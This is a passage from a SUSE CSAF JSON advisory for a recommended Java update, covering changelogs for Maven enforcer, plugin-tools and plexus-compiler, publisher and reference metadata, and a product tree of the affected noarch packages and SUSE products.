ranges\n + Semantics of \u0027ignores\u0027 parameter of \u0027banDynamicVersions\u0027 is inverted\n + Omission of \u0027excludedScopes\u0027 parameter of \u0027banDynamicVersions\u0027 causes NPE\n + ENFORCER: plugin-info and mojo pages not found\n\n * New Features:\n\n + requireUpperBounds deps should have includes\n + Introduce RequireTextFileChecksum with line separator normalization\n + allow no rules\n + show rules processed\n + DependencyConvergence should support including/excluding certain dependencies\n + Support declaring external banned dependencies in an external file/URL\n + Maven enforcer rule which checks that all dependencies have an explicit scope set\n + Maven enforcer rule which checks that all dependencies in dependencyManagement don\u0027t have an explicit scope set\n + Rule for no version ranges, version placeholders or SNAPSHOT versions\n + Allow one of many files in RequireFiles rules to pass\n + Skip specific rules\n + New Enforcer API\n + New Enforcer API - RuleConfigProvider\n + Move Built-In Rules to new API\n\n * Improvements:\n\n + wildcard ignore in requireReleaseDeps\n + Improve documentation about writing own Enforcer Rule\n + RequireActiveProfile should respect inherited activated profiles\n + Upgrade maven-dependency-tree to 3.x\n + Improve dependency resolving in multiple modules project\n + requireUpperBoundDeps: add [\u003cscope\u003e] and colors to the output\n + Example for writing a custom rule should be upgraded\n + Along with JavaVersion, allow enforcement of the JavaVendor\n + Included Java vendor in display-info output\n + requireMavenVersion x.y.z is processed as (,x.y.z] instead of [x.y.z,)\n + Consistently format artifacts same as dependency:tree\n + Made build Reproducible\n + Added support for excludes/includes in requireJavaVendor rule\n + Introduce Maven Enforcer Extension\n + Extends RequirePluginVersions with banMavenDefaults\n + Shared GitHub Actions\n + Log at ERROR level when \u003cfail\u003e is set\n + Reuse getDependenciesToCheck results across rules\n + Violation messages can be really hard to find in a multi module project\n + Clarify class loading for custom Enforcer rules\n + Using junit jupiter bom instead of single artifacts.\n + Get rid of maven-dependency-tree dependency\n + Allow 8 as JDK version for requireJavaVersion\n + Improve error message for rule \u0027requireJavaVersion\u0027\n + Include Java Home in Message for Java Rule Failures\n + Manage all Maven Core dependencies as provided\n + Mange rules configuration by plugin\n + Deprecate \u0027rules\u0027 property and introduce \u0027enforcer.rules\u0027 as a replacement\n + Change success message from executed to passed\n + EnforcerLogger: Provide isDebugEnabled(), isErrorEnabled(), isWarnEnabled() and isInfoEnabled()\n + Properly declare dependencies\n\n * Test:\n\n + Regression test for dependency convergence problem fixed in 3.0.0\n\n * Task:\n\n + Removed reference to travis or switch to travis.com\n + Fixed maven assembly links\n + Require Java 8\n + Verify working with Maven 4\n + Code cleanup\n + Refresh download page\n + Deprecate display-info mojo\n + Refresh site descriptors\n + Superfluous blanks in BanDuplicatePomDependencyVersions\n + Rename ResolveUtil to ResolverUtil\n\n maven-plugin-tools was updated from version 3.6.0 to version 3.9.0:\n\n - Changes of version 3.9.0:\n\n * Bugs fixed:\n\n + Fixed *-mojo.xml (in PluginXdocGenerator) is overwritten when multiple locales are defined\n + Generated table by PluginXdocGenerator does not contain default attributes\n\n * Improvements:\n\n + Omit empty line in generated help goal output if plugin description is empty\n + Use Plexus I18N rather than fiddling with\n\n * Task:\n\n + Removed reporting from maven-plugin-plugin: create maven-plugin-report-plugin\n\n * Dependency upgrade:\n\n + Upgrade plugins and components (in ITs)\n\n- Changes of version 3.8.2:\n\n * Improvements:\n\n + Used Resolver API, get rid of localRepository\n\n * Dependency upgrade:\n\n + Bump httpcore from 4.4.15 to 4.4.16\n + Bump httpclient from 4.5.13 to 4.5.14\n + Bump antVersion from 1.10.12 to 1.10.13\n + Bump slf4jVersion from 1.7.5 to 1.7.36\n + Bump plexus-java from 1.1.1 to 1.1.2\n + Bump plexus-archiver from 4.6.1 to 4.6.3\n + Bump jsoup from 1.15.3 to 1.15.4\n + Bump asmVersion from 9.4 to 9.5\n + Bump assertj-core from 3.23.1 to 3.24.2\n\n- Changes of version 3.8.1:\n\n * Bugs fixed:\n\n + Javadoc reference containing a link label with spaces are not detected\n + JavadocLinkGenerator.createLink: Support nested binary class names\n + ERROR during build of m-plugin-report-p and m-plugin-p: Dependencies in wrong scope\n + \u0027Executes as an aggregator plugin\u0027 documentation: s/plugin/goal/\n + Maven scope warning should be logged at WARN level\n + Fixed Temporary File Information Disclosure Vulnerability\n\n * New features:\n\n + Support mojos using the new maven v4 api\n\n * Improvements:\n\n + Plugin descriptor should contain the requiredJavaVersion/requiredMavenVersion\n + Execute annotation only supports standard lifecycle phases due to use of enum\n + Clarify deprecation of all extractors but the maven-plugin-tools-annotations\n\n * Dependency upgrade:\n\n + Update to Maven Parent POM 39\n + Bump junit-bom from 5.9.1 to 5.9.2\n + Bump plexus-archiver from 4.5.0 to 4.6.1\n\n- Changes of version 3.7.1:\n * Bugs fixed:\n\n + Maven scope warning should be logged at WARN level\n\n- Changes of version 3.7.0:\n\n * Bugs fixed:\n\n + The plugin descriptor generated by plugin:descriptor does not consider @ see javadoc taglets\n + Report-Mojo doesn\u0027t respect input encoding\n + Generating site reports for plugin results in\n NoSuchMethodError\n + JDK Requirements in plugin-info.html: Consider property \u0027maven.compiler.release\u0027\n + Parameters documentation inheriting @ since from Mojo can be confusing\n + Don\u0027t emit warning for missing javadoc URL of primitives\n + Don\u0027t emit warning for missing javadoc URI if no javadoc sources are configured\n + Parameter description should be taken from annotated item\n\n * New Features:\n\n + Added link to javadoc in configuration description page for user defined types of Mojos.\n + Allow only @ Deprecated annotation without @ deprecated javadoc tag\n + add system requirements history section\n + report: allow to generate usage section in plugin-info.html with true\n + Allow @ Parameter on setters methods\n + Extract plugin report into its own plugin\n + report: Expose generics information of Collection and Map types\n\n * Improvement:\n\n + plugin-info.html should contain a better Usage section\n + Do not overwrite generate files with no content change\n + Upgrade to JUnit 5 and @ Inject annotations\n + Support for java 20 - ASM 9.4\n + Don\u0027t print empty Memory, Disk Space in System Requirements\n + simplification in helpmojo build\n + Get rid of plexus-compiler-manager from tests\n + Use Maven core artifacts in provided scope\n + report and descriptor goal need to evaluate Javadoc comments differently\n + Allow to reference aggregator javadoc from plugin report\n\n * Task:\n\n + Detect legacy/javadoc Mojo definitions, warn to use Java 5 annotations\n + Update level to Java 8\n + Deprecate scripting support for mojos\n + Deprecate requirements parameter in report Mojo\n + Removed duplicate code from PluginReport\n + Prepare for Doxia (Sitetools) 2.0.0\n + Fixed documentation for maven-plugin-report-plugin\n + Removed deprecated items from new maven-plugin-report-plugin\n + Improve site build\n + Improve dependency management\n + Plugin generator generation fails when the parent class comes from a different project\n\n * Dependency upgrade:\n\n + Upgrade Maven Reporting API/Impl to 3.1.0\n + Upgrade Parent to 36\n + Upgrade project dependencies after JDK 1.8\n + Bump maven-parent from 36 to 37\n + Upgrade Maven Reporting API to 3.1.1/Maven Reporting Impl to 3.2.0\n + Upgrade plexus-utils to 3.5.0\n\n- Changes of version 3.6.4:\n\n * Restored compatibility with Maven 3 ecosystem\n * Upgraded dependencies\n\n- Changes of version 3.6.3:\n\n * Added prerequisites to plugin pom\n * Exclude dependency in provided scope from plugin descriptor\n * Get rid of String.format use\n * Fixed this logging as well\n * Simplify documentation\n * Exclude maven-archiver and maven-jxr from warning\n\n- Changes of version 3.6.2:\n\n * Deprecated unused requiresReports flag\n * Check that Maven dependencies are provided scope\n * Update ITs\n * Use shared gh action\n * Deprecate unsupported Mojo descriptor items\n * Weed out ITs\n * Upgrade to maven 3.x and avoid using deprecated API\n * Drop legacy dependencies\n * Use shared gh action - v1\n * Fixed wording in javadoc\n\n- Changes of version 3.6.1:\n\n * What\u0027s Changed:\n * Added missing @OverRide and make methods static\n * Upgraded to JUnit 4.12\n * Upgraded parent POM and other dependencies\n * Updated plugins\n * Upgraded Doxia Sitetools to 1.9.2 to remove dependency on Struts\n * removed Maven 2 info\n * Removed unneeded dependency\n * Tighten the dependency tree\n * Ignore .checkstyle\n * Strict dependencies for maven-plugin-tools-annotations\n * Improved @execute(goal...) docs\n * Improve @execute(lifecycle...) docs\n\nplexus-compiler was updated from version 2.11.1 to 2.14.2:\n\n- Changes of 2.14.2:\n\n * Removed:\n\n + Drop J2ObjC compiler\n\n * New features and improvements:\n\n + Update AspectJ Compiler to 1.9.21 to support Java 21\n + Require JDK 17 for build\n + Improve locking on JavacCompiler\n + Include \u0027parameter\u0027 and \u0027preview\u0027 describe log\n + Switch to SISU annotations and plugin, fixes #217\n + Support jdk 21\n + Require Maven 3.5.4+\n + Require Java 11 for plexus-compiler-eclipse an\n javac-errorprone and aspectj compilers\n + Added support to run its with Java 20\n\n * Bugs fixed:\n\n + Fixed javac memory leak\n + Validate zip file names before extracting (Zip Slip)\n + Restore AbstractCompiler#getLogger() method\n + Return empty list for not existing source root location\n + Improve javac error output parsing\n\n- Changes of 2.13.0:\n\n * New features and improvements:\n\n + Fully ignore any possible jdk bug\n + MCOMPILER-402: Added implicitOption to CompilerConfiguration\n + Added a custom compile argument\n replaceProcessorPathWithProcessorModulePath to force the\n plugin replace processorPath with processormodulepath\n + describe compiler configuration on run\n + simplify \u0027Compiling\u0027 info message: display relative path\n\n * Bugs fixed:\n\n + Respect CompilerConfiguration.sourceFiles in\n EclipseJavaCompiler\n + Avoid NPE in AspectJCompilerTest on AspectJ 1.9.8+\n\n * Dependency updates:\n\n + Bump maven-surefire-plugin from 3.0.0-M5 to 3.0.0-M6\n + Bump error_prone_core from 2.11.0 to 2.13.1\n + Bump github/codeql-action from 1 to 2\n + Bump ecj from 3.28.0 to 3.29.0\n + Bump release-drafter/release-drafter from 5.18.1 to 5.19.0\n + Bump ecj from 3.29.0 to 3.30.0\n + Bump maven-invoker-plugin from 3.2.2 to 3.3.0\n + Bump maven-enforcer-plugin from 3.0.0 to 3.1.0\n + Bump error_prone_core from 2.13.1 to 2.14.0\n + Bump maven-surefire-plugin from 3.0.0-M6 to 3.0.0-M7\n + Bump ecj from 3.31.0 to 3.32.0\n + Bump junit-bom from 5.9.0 to 5.9.1\n + Bump ecj from 3.30.0 to 3.31.0\n + Bump groovy from 3.0.12 to 3.0.13\n + Bump groovy-json from 3.0.12 to 3.0.13\n + Bump groovy-xml from 3.0.12 to 3.0.13\n + Bump animal-sniffer-maven-plugin from 1.21 to 1.22\n + Bump error_prone_core from 2.14.0 to 2.15.0\n + Bump junit-bom from 5.8.2 to 5.9.0\n + Bump groovy-xml from 3.0.11 to 3.0.12\n + Bump groovy-json from 3.0.11 to 3.0.12\n + Bump groovy from 3.0.11 to 3.0.12\n\n * Maintenance:\n\n + Require Maven 3.2.5\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2024-560,SUSE-SLE-Module-Basesystem-15-SP5-2024-560,SUSE-SLE-Module-Development-Tools-15-SP5-2024-560,SUSE-SLE-Module-SUSE-Manager-Server-4.3-2024-560,SUSE-SLE-Product-HPC-15-SP2-LTSS-2024-560,SUSE-SLE-Product-HPC-15-SP3-LTSS-2024-560,SUSE-SLE-Product-HPC-15-SP4-ESPOS-2024-560,SUSE-SLE-Product-HPC-15-SP4-LTSS-2024-560,SUSE-SLE-Product-SLED-15-SP4-LTSS-2024-560,SUSE-SLE-Product-SLES-15-SP2-LTSS-2024-560,SUSE-SLE-Product-SLES-15-SP3-LTSS-2024-560,SUSE-SLE-Product-SLES-15-SP4-LTSS-2024-560,SUSE-SLE-Product-SLES_SAP-15-SP2-2024-560,SUSE-SLE-Product-SLES_SAP-15-SP3-2024-560,SUSE-SLE-Product-SLES_SAP-15-SP4-2024-560,SUSE-SLE-Product-SUSE-Manager-Proxy-4.3-2024-560,SUSE-SLE-Product-SUSE-Manager-Server-4.3-2024-560,SUSE-Storage-7.1-2024-560,openSUSE-SLE-15.5-2024-560",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-ru-2024_0560-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-RU-2024:0560-1",
"url": "https://www.suse.com/support/update/announcement//suse-ru-20240560-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-RU-2024:0560-1",
"url": "https://lists.suse.com/pipermail/sle-updates/2024-February/034327.html"
},
{
"category": "self",
"summary": "SUSE Bug 1215973",
"url": "https://bugzilla.suse.com/1215973"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-37460 page",
"url": "https://www.suse.com/security/cve/CVE-2023-37460/"
}
],
"title": "Recommended update for Java",
"tracking": {
"current_release_date": "2024-02-21T04:34:23Z",
"generator": {
"date": "2024-02-21T04:34:23Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-RU-2024:0560-1",
"initial_release_date": "2024-02-21T04:34:23Z",
"revision_history": [
{
"date": "2024-02-21T04:34:23Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "maven-archiver-3.6.1-150200.3.7.3.noarch",
"product": {
"name": "maven-archiver-3.6.1-150200.3.7.3.noarch",
"product_id": "maven-archiver-3.6.1-150200.3.7.3.noarch"
}
},
{
"category": "product_version",
"name": "maven-archiver-javadoc-3.6.1-150200.3.7.3.noarch",
"product": {
"name": "maven-archiver-javadoc-3.6.1-150200.3.7.3.noarch",
"product_id": "maven-archiver-javadoc-3.6.1-150200.3.7.3.noarch"
}
},
{
"category": "product_version",
"name": "maven-assembly-plugin-3.6.0-150200.3.7.2.noarch",
"product": {
"name": "maven-assembly-plugin-3.6.0-150200.3.7.2.noarch",
"product_id": "maven-assembly-plugin-3.6.0-150200.3.7.2.noarch"
}
},
{
"category": "product_version",
"name": "maven-assembly-plugin-javadoc-3.6.0-150200.3.7.2.noarch",
"product": {
"name": "maven-assembly-plugin-javadoc-3.6.0-150200.3.7.2.noarch",
"product_id": "maven-assembly-plugin-javadoc-3.6.0-150200.3.7.2.noarch"
}
},
{
"category": "product_version",
"name": "maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"product": {
"name": "maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"product_id": "maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch"
}
},
{
"category": "product_version",
"name": "maven-common-artifact-filters-javadoc-3.3.2-150200.3.7.3.noarch",
"product": {
"name": "maven-common-artifact-filters-javadoc-3.3.2-150200.3.7.3.noarch",
"product_id": "maven-common-artifact-filters-javadoc-3.3.2-150200.3.7.3.noarch"
}
},
{
"category": "product_version",
"name": "maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"product": {
"name": "maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"product_id": "maven-compiler-plugin-3.11.0-150200.3.7.1.noarch"
}
},
{
"category": "product_version",
"name": "maven-compiler-plugin-bootstrap-3.11.0-150200.3.7.1.noarch",
"product": {
"name": "maven-compiler-plugin-bootstrap-3.11.0-150200.3.7.1.noarch",
"product_id": "maven-compiler-plugin-bootstrap-3.11.0-150200.3.7.1.noarch"
}
},
{
"category": "product_version",
"name": "maven-compiler-plugin-javadoc-3.11.0-150200.3.7.1.noarch",
"product": {
"name": "maven-compiler-plugin-javadoc-3.11.0-150200.3.7.1.noarch",
"product_id": "maven-compiler-plugin-javadoc-3.11.0-150200.3.7.1.noarch"
}
},
{
"category": "product_version",
"name": "maven-dependency-analyzer-1.13.2-150200.3.7.2.noarch",
"product": {
"name": "maven-dependency-analyzer-1.13.2-150200.3.7.2.noarch",
"product_id": "maven-dependency-analyzer-1.13.2-150200.3.7.2.noarch"
}
},
{
"category": "product_version",
"name": "maven-dependency-analyzer-javadoc-1.13.2-150200.3.7.2.noarch",
"product": {
"name": "maven-dependency-analyzer-javadoc-1.13.2-150200.3.7.2.noarch",
"product_id": "maven-dependency-analyzer-javadoc-1.13.2-150200.3.7.2.noarch"
}
},
{
"category": "product_version",
"name": "maven-dependency-plugin-3.6.0-150200.3.7.2.noarch",
"product": {
"name": "maven-dependency-plugin-3.6.0-150200.3.7.2.noarch",
"product_id": "maven-dependency-plugin-3.6.0-150200.3.7.2.noarch"
}
},
{
"category": "product_version",
"name": "maven-dependency-plugin-javadoc-3.6.0-150200.3.7.2.noarch",
"product": {
"name": "maven-dependency-plugin-javadoc-3.6.0-150200.3.7.2.noarch",
"product_id": "maven-dependency-plugin-javadoc-3.6.0-150200.3.7.2.noarch"
}
},
{
"category": "product_version",
"name": "maven-dependency-tree-3.2.1-150200.3.7.2.noarch",
"product": {
"name": "maven-dependency-tree-3.2.1-150200.3.7.2.noarch",
"product_id": "maven-dependency-tree-3.2.1-150200.3.7.2.noarch"
}
},
{
"category": "product_version",
"name": "maven-dependency-tree-javadoc-3.2.1-150200.3.7.2.noarch",
"product": {
"name": "maven-dependency-tree-javadoc-3.2.1-150200.3.7.2.noarch",
"product_id": "maven-dependency-tree-javadoc-3.2.1-150200.3.7.2.noarch"
}
},
{
"category": "product_version",
"name": "maven-enforcer-3.4.1-150200.3.7.2.noarch",
"product": {
"name": "maven-enforcer-3.4.1-150200.3.7.2.noarch",
"product_id": "maven-enforcer-3.4.1-150200.3.7.2.noarch"
}
},
{
"category": "product_version",
"name": "maven-enforcer-api-3.4.1-150200.3.7.2.noarch",
"product": {
"name": "maven-enforcer-api-3.4.1-150200.3.7.2.noarch",
"product_id": "maven-enforcer-api-3.4.1-150200.3.7.2.noarch"
}
},
{
"category": "product_version",
"name": "maven-enforcer-extension-3.4.1-150200.3.7.2.noarch",
"product": {
"name": "maven-enforcer-extension-3.4.1-150200.3.7.2.noarch",
"product_id": "maven-enforcer-extension-3.4.1-150200.3.7.2.noarch"
}
},
{
"category": "product_version",
"name": "maven-enforcer-javadoc-3.4.1-150200.3.7.2.noarch",
"product": {
"name": "maven-enforcer-javadoc-3.4.1-150200.3.7.2.noarch",
"product_id": "maven-enforcer-javadoc-3.4.1-150200.3.7.2.noarch"
}
},
{
"category": "product_version",
"name": "maven-enforcer-plugin-3.4.1-150200.3.7.2.noarch",
"product": {
"name": "maven-enforcer-plugin-3.4.1-150200.3.7.2.noarch",
"product_id": "maven-enforcer-plugin-3.4.1-150200.3.7.2.noarch"
}
},
{
"category": "product_version",
"name": "maven-enforcer-rules-3.4.1-150200.3.7.2.noarch",
"product": {
"name": "maven-enforcer-rules-3.4.1-150200.3.7.2.noarch",
"product_id": "maven-enforcer-rules-3.4.1-150200.3.7.2.noarch"
}
},
{
"category": "product_version",
"name": "maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"product": {
"name": "maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"product_id": "maven-plugin-annotations-3.9.0-150200.3.7.3.noarch"
}
},
{
"category": "product_version",
"name": "maven-plugin-plugin-3.9.0-150200.3.7.5.noarch",
"product": {
"name": "maven-plugin-plugin-3.9.0-150200.3.7.5.noarch",
"product_id": "maven-plugin-plugin-3.9.0-150200.3.7.5.noarch"
}
},
{
"category": "product_version",
"name": "maven-plugin-plugin-bootstrap-3.9.0-150200.3.7.1.noarch",
"product": {
"name": "maven-plugin-plugin-bootstrap-3.9.0-150200.3.7.1.noarch",
"product_id": "maven-plugin-plugin-bootstrap-3.9.0-150200.3.7.1.noarch"
}
},
{
"category": "product_version",
"name": "maven-plugin-plugin-javadoc-3.9.0-150200.3.7.5.noarch",
"product": {
"name": "maven-plugin-plugin-javadoc-3.9.0-150200.3.7.5.noarch",
"product_id": "maven-plugin-plugin-javadoc-3.9.0-150200.3.7.5.noarch"
}
},
{
"category": "product_version",
"name": "maven-plugin-tools-annotations-3.9.0-150200.3.7.3.noarch",
"product": {
"name": "maven-plugin-tools-annotations-3.9.0-150200.3.7.3.noarch",
"product_id": "maven-plugin-tools-annotations-3.9.0-150200.3.7.3.noarch"
}
},
{
"category": "product_version",
"name": "maven-plugin-tools-ant-3.9.0-150200.3.7.3.noarch",
"product": {
"name": "maven-plugin-tools-ant-3.9.0-150200.3.7.3.noarch",
"product_id": "maven-plugin-tools-ant-3.9.0-150200.3.7.3.noarch"
}
},
{
"category": "product_version",
"name": "maven-plugin-tools-api-3.9.0-150200.3.7.3.noarch",
"product": {
"name": "maven-plugin-tools-api-3.9.0-150200.3.7.3.noarch",
"product_id": "maven-plugin-tools-api-3.9.0-150200.3.7.3.noarch"
}
},
{
"category": "product_version",
"name": "maven-plugin-tools-beanshell-3.9.0-150200.3.7.3.noarch",
"product": {
"name": "maven-plugin-tools-beanshell-3.9.0-150200.3.7.3.noarch",
"product_id": "maven-plugin-tools-beanshell-3.9.0-150200.3.7.3.noarch"
}
},
{
"category": "product_version",
"name": "maven-plugin-tools-generators-3.9.0-150200.3.7.3.noarch",
"product": {
"name": "maven-plugin-tools-generators-3.9.0-150200.3.7.3.noarch",
"product_id": "maven-plugin-tools-generators-3.9.0-150200.3.7.3.noarch"
}
},
{
"category": "product_version",
"name": "maven-plugin-tools-java-3.9.0-150200.3.7.3.noarch",
"product": {
"name": "maven-plugin-tools-java-3.9.0-150200.3.7.3.noarch",
"product_id": "maven-plugin-tools-java-3.9.0-150200.3.7.3.noarch"
}
},
{
"category": "product_version",
"name": "maven-plugin-tools-javadoc-3.9.0-150200.3.7.3.noarch",
"product": {
"name": "maven-plugin-tools-javadoc-3.9.0-150200.3.7.3.noarch",
"product_id": "maven-plugin-tools-javadoc-3.9.0-150200.3.7.3.noarch"
}
},
{
"category": "product_version",
"name": "maven-plugin-tools-model-3.9.0-150200.3.7.3.noarch",
"product": {
"name": "maven-plugin-tools-model-3.9.0-150200.3.7.3.noarch",
"product_id": "maven-plugin-tools-model-3.9.0-150200.3.7.3.noarch"
}
},
{
"category": "product_version",
"name": "maven-script-ant-3.9.0-150200.3.7.3.noarch",
"product": {
"name": "maven-script-ant-3.9.0-150200.3.7.3.noarch",
"product_id": "maven-script-ant-3.9.0-150200.3.7.3.noarch"
}
},
{
"category": "product_version",
"name": "maven-script-beanshell-3.9.0-150200.3.7.3.noarch",
"product": {
"name": "maven-script-beanshell-3.9.0-150200.3.7.3.noarch",
"product_id": "maven-script-beanshell-3.9.0-150200.3.7.3.noarch"
}
},
{
"category": "product_version",
"name": "objectweb-asm-9.6-150200.3.11.3.noarch",
"product": {
"name": "objectweb-asm-9.6-150200.3.11.3.noarch",
"product_id": "objectweb-asm-9.6-150200.3.11.3.noarch"
}
},
{
"category": "product_version",
"name": "objectweb-asm-javadoc-9.6-150200.3.11.3.noarch",
"product": {
"name": "objectweb-asm-javadoc-9.6-150200.3.11.3.noarch",
"product_id": "objectweb-asm-javadoc-9.6-150200.3.11.3.noarch"
}
},
{
"category": "product_version",
"name": "plexus-archiver-4.8.0-150200.3.7.2.noarch",
"product": {
"name": "plexus-archiver-4.8.0-150200.3.7.2.noarch",
"product_id": "plexus-archiver-4.8.0-150200.3.7.2.noarch"
}
},
{
"category": "product_version",
"name": "plexus-archiver-javadoc-4.8.0-150200.3.7.2.noarch",
"product": {
"name": "plexus-archiver-javadoc-4.8.0-150200.3.7.2.noarch",
"product_id": "plexus-archiver-javadoc-4.8.0-150200.3.7.2.noarch"
}
},
{
"category": "product_version",
"name": "plexus-compiler-2.14.2-150200.3.9.2.noarch",
"product": {
"name": "plexus-compiler-2.14.2-150200.3.9.2.noarch",
"product_id": "plexus-compiler-2.14.2-150200.3.9.2.noarch"
}
},
{
"category": "product_version",
"name": "plexus-compiler-extras-2.14.2-150200.3.9.2.noarch",
"product": {
"name": "plexus-compiler-extras-2.14.2-150200.3.9.2.noarch",
"product_id": "plexus-compiler-extras-2.14.2-150200.3.9.2.noarch"
}
},
{
"category": "product_version",
"name": "plexus-compiler-javadoc-2.14.2-150200.3.9.2.noarch",
"product": {
"name": "plexus-compiler-javadoc-2.14.2-150200.3.9.2.noarch",
"product_id": "plexus-compiler-javadoc-2.14.2-150200.3.9.2.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Module for Basesystem 15 SP5",
"product": {
"name": "SUSE Linux Enterprise Module for Basesystem 15 SP5",
"product_id": "SUSE Linux Enterprise Module for Basesystem 15 SP5",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-basesystem:15:sp5"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Module for Development Tools 15 SP5",
"product": {
"name": "SUSE Linux Enterprise Module for Development Tools 15 SP5",
"product_id": "SUSE Linux Enterprise Module for Development Tools 15 SP5",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-development-tools:15:sp5"
}
}
},
{
"category": "product_name",
"name": "SUSE Manager Server Module 4.3",
"product": {
"name": "SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-suse-manager-server:4.3"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-ltss:15:sp2"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-ltss:15:sp3"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-espos:15:sp4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-ltss:15:sp4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server 15 SP2-LTSS",
"product": {
"name": "SUSE Linux Enterprise Server 15 SP2-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP2-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles-ltss:15:sp2"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server 15 SP3-LTSS",
"product": {
"name": "SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles-ltss:15:sp3"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server 15 SP4-LTSS",
"product": {
"name": "SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles-ltss:15:sp4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP2",
"product": {
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP2",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP2",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles_sap:15:sp2"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product": {
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles_sap:15:sp3"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product": {
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles_sap:15:sp4"
}
}
},
{
"category": "product_name",
"name": "SUSE Manager Proxy 4.3",
"product": {
"name": "SUSE Manager Proxy 4.3",
"product_id": "SUSE Manager Proxy 4.3",
"product_identification_helper": {
"cpe": "cpe:/o:suse:suse-manager-proxy:4.3"
}
}
},
{
"category": "product_name",
"name": "SUSE Manager Server 4.3",
"product": {
"name": "SUSE Manager Server 4.3",
"product_id": "SUSE Manager Server 4.3",
"product_identification_helper": {
"cpe": "cpe:/o:suse:suse-manager-server:4.3"
}
}
},
{
"category": "product_name",
"name": "SUSE Enterprise Storage 7.1",
"product": {
"name": "SUSE Enterprise Storage 7.1",
"product_id": "SUSE Enterprise Storage 7.1",
"product_identification_helper": {
"cpe": "cpe:/o:suse:ses:7.1"
}
}
},
{
"category": "product_name",
"name": "openSUSE Leap 15.5",
"product": {
"name": "openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:leap:15.5"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "objectweb-asm-9.6-150200.3.11.3.noarch as component of SUSE Linux Enterprise Module for Basesystem 15 SP5",
"product_id": "SUSE Linux Enterprise Module for Basesystem 15 SP5:objectweb-asm-9.6-150200.3.11.3.noarch"
},
